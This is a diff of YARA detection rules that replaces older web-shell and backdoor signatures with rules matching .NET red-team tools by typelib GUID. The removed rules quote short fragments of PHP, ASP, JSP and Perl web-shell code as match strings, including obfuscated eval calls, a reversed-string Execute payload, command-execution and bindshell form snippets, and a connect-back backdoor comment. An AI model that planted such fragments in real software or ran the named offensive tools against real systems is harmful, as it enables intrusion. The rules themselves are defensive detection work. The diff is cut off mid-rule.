+		date = "2023-03-15"
+		modified = "2025-08-15"
+		reference = "https://github.com/Mayyhem/SharpSCCM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4576-L4590"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cf2ab009cbd2576a806bfefb74906fdf"
-		logic_hash = "280be378bc6cf52ef9454083180015ed00f9d0bc936620a4105c34c3a3002383"
-		score = 70
+		logic_hash = "a6650a1a2ad710b85363ea04d66f2467b835bc7bd1097404238f67e07cc3f719"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u"
+		$typelibguid0lo = "03652836-898e-4a9f-b781-b7d86e750f60" ascii wide
+		$typelibguid1lo = "e4d9ef39-0fce-4573-978b-abf8df6aec23" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_PHP
+rule SIGNATURE_BASE_HKTL_NET_GUID_Koh : FILE
 {
 	meta:
-		description = "Web shells - generated from file PHP.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3598-L3615"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9702526c-b10d-553d-a803-47e352533858"
+		date = "2023-03-18"
+		modified = "2025-08-15"
+		reference = "https://github.com/GhostPack/Koh"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4592-L4605"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a524e7ae8d71e37d2fd3e5fbdab405ea"
-		logic_hash = "706f835f63e153f907ae8a5a48f1dc4b9d3b8511b21b7155bc045b0ebdc893fc"
-		score = 70
+		logic_hash = "dbb36a1a8f559d10152d14459509408b14f3dc52a685d81f3a3d5e936f5e2a66"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "echo \"<font color=blue>Error!</font>\";" fullword
-		$s2 = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE"
-		$s5 = " - ExpDoor.com</title>" fullword
-		$s10 = "$f=fopen($_POST[\"f\"],\"w\");" fullword
-		$s12 = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" fullword
+		$typelibguid0lo = "4d5350c8-7f8c-47cf-8cde-c752018af17e" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Asp
+rule SIGNATURE_BASE_HKTL_NET_GUID_Forgecert : FILE
 {
 	meta:
-		description = "Web shells - generated from file Asp.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3616-L3631"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "06b3ffbb-5a76-50a0-86dc-b9658bf2d7ec"
+		date = "2023-03-18"
+		modified = "2025-08-15"
+		reference = "https://github.com/GhostPack/ForgeCert"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4607-L4620"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "32c87744ea404d0ea0debd55915010b7"
-		logic_hash = "dd2e9f753e8fa781c28c2d5bb9336bb3f39ed8a496bd89eb54bc1812ef512ab5"
-		score = 70
+		logic_hash = "4cb79315afc5aae2b35a1d171e8cff34304534a8970b51831568d34135e5c5e6"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" fullword
-		$s2 = "Function MorfiCoder(Code)" fullword
-		$s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" fullword
+		$typelibguid0lo = "bd346689-8ee6-40b3-858b-4ed94f08d40a" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Perlbot_Pl
+rule SIGNATURE_BASE_HKTL_NET_GUID_Crassus : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file perlbot.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "378cb0e4-2069-50b7-ab3e-5a81055e9983"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3635-L3646"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d4f94aa3-0431-5ac1-8718-0f0526c3714f"
+		date = "2023-03-18"
+		modified = "2025-08-15"
+		reference = "https://github.com/vu-ls/Crassus"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4622-L4635"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7e4deb9884ffffa5d82c22f8dc533a45"
-		logic_hash = "784980d620e71fb0cf5aed9ef8bd171a8f50d850bc782645575070b75c42e426"
+		logic_hash = "c6442a8bd4737f0a874c388c74a632bea29c0c8b8c7cc132ad4f145d7a73446b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")"
-		$s1 = "#Acesso a Shel - 1 ON 0 OFF"
+		$typelibguid0lo = "7e9729aa-4cf2-4d0a-8183-7fb7ce7a5b1a" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Php_Backdoor_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Restrictedadmin : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file php-backdoor.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "aca53071-f793-538d-bbeb-34469cdb4d1f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3647-L3659"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1b3572a5-bb21-58bb-91f9-963a0a17d699"
+		date = "2023-03-18"
+		modified = "2025-08-15"
+		reference = "https://github.com/GhostPack/RestrictedAdmin"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4637-L4650"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
-		logic_hash = "acab82b40760b45d49da51953f78c69166955de54918634c9bfe394208cdbb56"
+		logic_hash = "876d0a89429c3e504696a63056b154acacdfa44fddba23298c2432accb71dfd2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "http://michaeldaw.org   2006"
-		$s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win"
-		$s3 = "coded by z0mbie"
+		$typelibguid0lo = "79f11fc0-abff-4e1f-b07c-5d65653d8952" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Liz0Zim_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_P2P : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "e91114ce-18f9-51cd-b41c-b796960ea4fe"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3660-L3672"
+		description = "Detects .NET red/black-team tools via typelibguid (p2p Remote Desktop is dual use but 100% flagged as malicious on VT)"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e7b2b4bd-f1e1-5062-9b36-5df44ae374ea"
+		date = "2023-03-19"
+		modified = "2025-08-15"
+		reference = "https://github.com/miroslavpejic85/p2p"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4652-L4665"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
-		logic_hash = "a0606dad4474579354709fe6306d15427afc4dec8ad6760a0ee9e91c86c23e4d"
+		logic_hash = "5cdbf5555f4a0dbcbd206708e8678d69ed64f20f734425becd5809396fcfa4b4"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt"
-		$s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass"
-		$s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword
+		$typelibguid0lo = "33456e72-f8e8-4384-88c4-700867df12e2" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Nshell__1__Php_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwsus : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Nshell (1).php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "44e8b6c5-6f41-5c37-a083-26acedd91956"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3673-L3684"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f020eea9-4ff4-5242-b9b2-53284505dab4"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/nettitude/SharpWSUS"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4667-L4680"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "973fc89694097a41e684b43a21b1b099"
-		logic_hash = "53c7cd24c4eddbded1b4c16fd2758bdf66c0bbe396e487a56d56fc053cf3cc1a"
+		logic_hash = "e42a5341d03da8b7efedb6bb71b2d908881a7b0df9101e8ad56984a3372915fe"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($"
-		$s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword
+		$typelibguid0lo = "42cabb74-1199-40f1-9354-6294bba8d3a4" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Shankar_Php_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpimpersonation : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file shankar.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "0c8ab3eb-574b-5e5a-8117-4efecef94f83"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3685-L3697"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5815c5bd-e3e8-5f2f-b03e-8a05fb4f6e91"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/S3cur3Th1sSh1t/SharpImpersonation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4682-L4695"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6eb9db6a3974e511b7951b8f7e7136bb"
-		logic_hash = "58b365206c18b8394cf1e03b71b8e47be10bc933bc2c05b7b03b7dad94f6d6b8"
+		logic_hash = "1fd989607bb22f903ad85905ae4fe9f84aa429f75cedd482a318d8cb6c37af19"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sAuthor = "ShAnKaR"
-		$s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input"
-		$s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b"
+		$typelibguid0lo = "27a85262-8c87-4147-a908-46728ab7fc73" ascii wide
 
 	condition:
-		1 of ( $s* ) and $sAuthor
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Casus15_Php_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcloud : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Casus15.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ba6748a2-fb80-5eda-816c-155bab9285e5"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3698-L3710"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "048b0239-ea13-58ff-af35-fd505b4c977a"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/chrismaddalena/SharpCloud"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4697-L4710"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5e2ede2d1c4fa1fcc3cbfe0c005d7b13"
-		logic_hash = "6ee7a07163d33ca329d3be2084406629711db14db4605e8413ee963eb0f9d5a7"
+		logic_hash = "b57f9577edcc15aef82f4fb7ceaf33bce73ae5e9d94b33152da49663a9a8f0c9"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na"
-		$s2 = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'"
-		$s3 = "value='Calistirmak istediginiz "
+		$typelibguid0lo = "ca4e257e-69c1-45c5-9375-ba7874371892" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Small_Php_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpssdp : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file small.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "cf4fb88f-a312-560d-be0b-b55bfcb889be"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3711-L3723"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8441e940-ab7c-5467-9db8-35f71bd57580"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/rvrsh3ll/SharpSSDP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4712-L4725"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fcee6226d09d150bfa5f103bee61fbde"
-		logic_hash = "e0444aa604e8956d423037b70b9476f5653503055d0f1bc875d43de144ce5c44"
+		logic_hash = "3bb849d481b4db321374e084c5bc83fef683fab5f70a429d79d72988f77d8403"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$pass='abcdef1234567890abcdef1234567890';" fullword
-		$s2 = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1"
-		$s4 = "@ini_set('error_log',NULL);" fullword
+		$typelibguid0lo = "6e383de4-de89-4247-a41a-79db1dc03aaa" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Shellbot_Pl
+rule SIGNATURE_BASE_HKTL_NET_GUID_Wiretap : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file shellbot.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "07c145b1-c9f7-564a-b354-a6d2072f380c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3724-L3738"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5513a295-8907-5a9c-adca-760b33004229"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/djhohnstein/WireTap"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4727-L4740"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b2a883bc3c03a35cfd020dd2ace4bab8"
-		logic_hash = "5db224e4fe8608bb53f044ca6c0361dc66cadd58c6d4ea5ab4f8ae14ebde0e6e"
+		logic_hash = "8dfe01e827fca5b6a2abb847b1615bf71c9d98ea7213b02aa94bb8691d085ac5"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "ShellBOT"
-		$s1 = "PacktsGr0up"
-		$s2 = "CoRpOrAtIoN"
-		$s3 = "# Servidor de irc que vai ser usado "
-		$s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)"
+		$typelibguid0lo = "b5067468-f656-450a-b29c-1c84cfe8dde5" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Fuckphpshell_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Kittylitter : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file fuckphpshell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "010db63b-ff72-5f97-8651-a1c7851471ff"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3739-L3752"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f457b91f-4adb-5be6-b9c2-f6cc39d4bdaf"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/djhohnstein/KittyLitter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4742-L4757"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "554e50c1265bb0934fcc8247ec3b9052"
-		logic_hash = "0c993960b4ca880b818c7b7ba726479ed1c64c46ef8ca82d3c990d69ebe43f42"
+		logic_hash = "e0cfb39be4d51d2a929712e4f82851b9cafb46643e1403cd4ea8414624a0a2b6"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$succ = \"Warning! "
-		$s1 = "Don`t be stupid .. this is a priv3 server, so take extra care!"
-		$s2 = "\\*=-- MEMBERS AREA --=*/"
-		$s3 = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o"
+		$typelibguid0lo = "449cf269-4798-4268-9a0d-9a17a08869ba" ascii wide
+		$typelibguid1lo = "e7a509a4-2d44-4e10-95bf-b86cb7767c2c" ascii wide
+		$typelibguid2lo = "b2b8dd4f-eba6-42a1-a53d-9a00fe785d66" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Ngh_Php_Php
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpview : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file ngh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "2d8ff3c1-d6b3-57ce-8213-232b376dbd05"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3753-L3767"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2ae1bc26-c137-55ce-ae2e-3204ff07f671"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/tevora-threat/SharpView"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4759-L4772"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c372b725419cdfd3f8a6371cfeebc2fd"
-		logic_hash = "c794b216bafdaecf5bd138cc8c7552efbb8c3c571a441489d02a19793a4c294f"
+		logic_hash = "b87f7c5c4d72a5d9d0f493720388f4328dc519677cc8cc218c4f0f95cc970a1e"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Cr4sh_aka_RKL"
-		$s1 = "NGH edition"
-		$s2 = "/* connectback-backdoor on perl"
-		$s3 = "<form action=<?=$script?>?act=bindshell method=POST>"
-		$s4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r"
+		$typelibguid0lo = "22a156ea-2623-45c7-8e50-e864d9fc44d3" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Jsp_Reverse_Jsp
+rule SIGNATURE_BASE_HKTL_NET_GUID_Farmer : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file jsp-reverse.jsp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4953b230-4cd9-55d6-a3cb-8d3713e7fb0c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3768-L3780"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f69745b9-4ebd-547a-9af3-bc340b076e5d"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/mdsecactivebreach/Farmer"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4774-L4790"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8b0e6779f25a17f0ffb3df14122ba594"
-		logic_hash = "bdd2db4c032b25faaaf3a3a8e769000013f643ecfcb8b0374165a244ad2162a6"
+		logic_hash = "3e8559dd84fdc698c47acdf19a3f28fe094c96a36d645422f69ad905df5b2263"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "// backdoor.jsp"
-		$s1 = "JSP Backdoor Reverse Shell"
-		$s2 = "http://michaeldaw.org"
+		$typelibguid0lo = "37da2573-d9b5-4fc2-ae11-ccb6130cea9f" ascii wide
+		$typelibguid1lo = "49acf861-1c10-49a1-bf26-139a3b3a9227" ascii wide
+		$typelibguid2lo = "9a6c028f-423f-4c2c-8db3-b3499139b822" ascii wide
+		$typelibguid3lo = "1c896837-e729-46a9-92b9-3bbe7ac2c90d" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Tool_Asp
+rule SIGNATURE_BASE_HKTL_NET_GUID_Aesshellcodeinjector : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Tool.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "e5e727bd-836b-5540-8755-40f37904bc03"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3781-L3794"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "6253e30b-7c92-5237-a706-e93403a7c0b6"
+		date = "2023-03-22"
+		modified = "2025-08-15"
+		reference = "https://github.com/san3ncrypt3d/AESShellCodeInjector"
